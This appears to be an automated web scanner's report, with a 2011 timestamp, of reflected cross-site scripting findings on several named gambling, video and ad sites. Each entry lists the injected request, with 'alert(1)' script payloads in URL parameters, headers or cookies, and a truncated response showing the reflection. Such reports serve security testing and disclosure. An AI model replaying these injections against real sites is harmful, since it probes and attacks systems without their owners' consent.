HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:21 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?d0cc2%22%3E ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /mobile/ |
GET /mobile/?d0cc2%22%3E Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:45 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... ular").css("padding-top", }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /mobile/ |
GET /mobile/?d0cc2%22%3E Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:28 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /mobile/ |
GET /mobile/?d0cc2%22%3E Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:49 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?d0cc2%22%3E ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /mobile/ |
GET /mobile/?d0cc2%22%3E Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:47:10 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... lar").css("padding-top", }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /mobile/ |
GET /mobile/?d0cc2%22%3E Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:52 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /home/ |
GET /home/?f18d6"><script>alert(1)< Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:51 GMT X-Powered-By: ASP.NET Pragma: no-cache Cache-Control: no-store Pragma: no-cache Cache-Control: no-store Content-Length: 45587 Content-Type: text/html Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/ Cache-control: private <!--version 1.0.0.1--> <html> <link rel="shortcut icon" href="http://www.bet365 <head> <META http-equiv="Content-Type" content="text/html; ...[SNIP]... <iframe src="./mainpage.asp?rn ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /home/default.asp |
GET /home/default.asp?936ef"><script>alert(1)< Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:52 GMT X-Powered-By: ASP.NET Pragma: no-cache Cache-Control: no-store Pragma: no-cache Cache-Control: no-store Content-Length: 45588 Content-Type: text/html Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/ Cache-control: private <!--version 1.0.0.1--> <html> <link rel="shortcut icon" href="http://www.bet365 <head> <META http-equiv="Content-Type" content="text/html; ...[SNIP]... <iframe src="./mainpage.asp?rn ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.metacafe.com |
Path: | /fplayer/ |
GET /fplayer/?4702d"><script>alert(1)< Host: www.metacafe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI CUR ADM OUR NOR STA NID" Content-Type: text/html Date: Mon, 16 May 2011 12:25:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PHPSESSID=f78158bb40 Set-Cookie: OAGEO=US%7CTX%7CDallas Set-Cookie: OAID=c8335f487e2ebd4 Set-Cookie: User=%7B%22sc%22%3A1%2C Set-Cookie: dsavip=3400536236.20480 Content-Length: 73154 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.okscratchcards |
Path: | / |
GET /?70343%27-alert(1)- Host: www.okscratchcards.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/7 Cookie: __utma=80613129 |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13008 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Mon, 16 May 2011 12:42:39 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... I_20"); window.open('https:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.okscratchcards |
Path: | / |
GET /?c9e66'-alert(1)- Host: www.okscratchcards.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 12560 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Mon, 16 May 2011 11:37:21 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... ; var cookie_id=getCookie("CSI window.open('https:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.okscratchcards |
Path: | /terms-and-conditions |
GET /terms-and-conditions Host: www.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22824 <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <title> Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets – okscratc ...[SNIP]... var cookie_id=getCookie("CSI window.open('https:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.okscratchcards |
Path: | /terms-and-conditions |
GET /terms-and-conditions Host: www.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22827 <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <title> Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets – okscratc ...[SNIP]... ; var cookie_id=getCookie("CSI window.open('https:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /index.asp |
GET /index.asp?curr=USD35af5'%3balert(1)/ Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 29900 Content-Type: text/html Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /index.asp |
GET /index.asp?curr=USD13cad"%3balert(1)/ Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 29898 Content-Type: text/html Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... document.trucksys.submit( DownloadCount(); } function doflashSidebar_ByLng() { var flashGettingStarted = new FlashObject("http://www flashGettingStarted flashGettingStarted flashGettingStarted ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://ad.yieldmanager |
Path: | /imp |
GET /imp?Z=728x90&s=1703625& Host: ad.yieldmanager.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com Cookie: BX=ek8k2sl67ofpa&b=4&s=o9 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:52:34 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" X-RightMedia-Hostname: raptor0243.rm.bf1 Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux Set-Cookie: vuday1=JOU8[NDf0(/hP#[; path=/; expires=Tue, 17-May-2011 00:00:00 GMT Set-Cookie: pv1="b!!!!#!$(#H!#yJY!$fh Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9 Set-Cookie: lifb=OrgU(-xY.<O0,nW; path=/; expires=Mon, 16-May-2011 13:52:34 GMT Cache-Control: no-store Last-Modified: Mon, 16 May 2011 12:52:34 GMT Pragma: no-cache Content-Length: 3662 Content-Type: application/x-javascript Age: 0 Proxy-Connection: close //raw JavaScript document.write('<scr'+ ...[SNIP]... asci_publiid = '1709175'; var asci_sectid = '1703625'; var asci_advliid = '3056520'; var asci_cid = '9245050'; var asci_p = '200'; var asci_refurl = escape('http://www.google if ( asci_refurl.length > ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.interwetten |
Path: | /sportsbook/registra |
GET /sportsbook/registra Host: www.interwetten.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)< Connection: close Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:45:46 GMT; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:45:46 GMT Content-Length: 199712 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head ...[SNIP]... wWindow = window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FMc00d9"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36955 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMc00d9"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:16:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMdcd02" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36955 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMdcd02"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FMb6100"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42312 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMb6100"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM8ced5" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42312 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM8ced5"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FMe5d81"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36175 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMe5d81"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMce8fc" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36175 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMce8fc"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FMede9a"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43229 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMede9a"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMa9953" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43228 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMa9953"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FM4f142"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37529 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM4f142"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
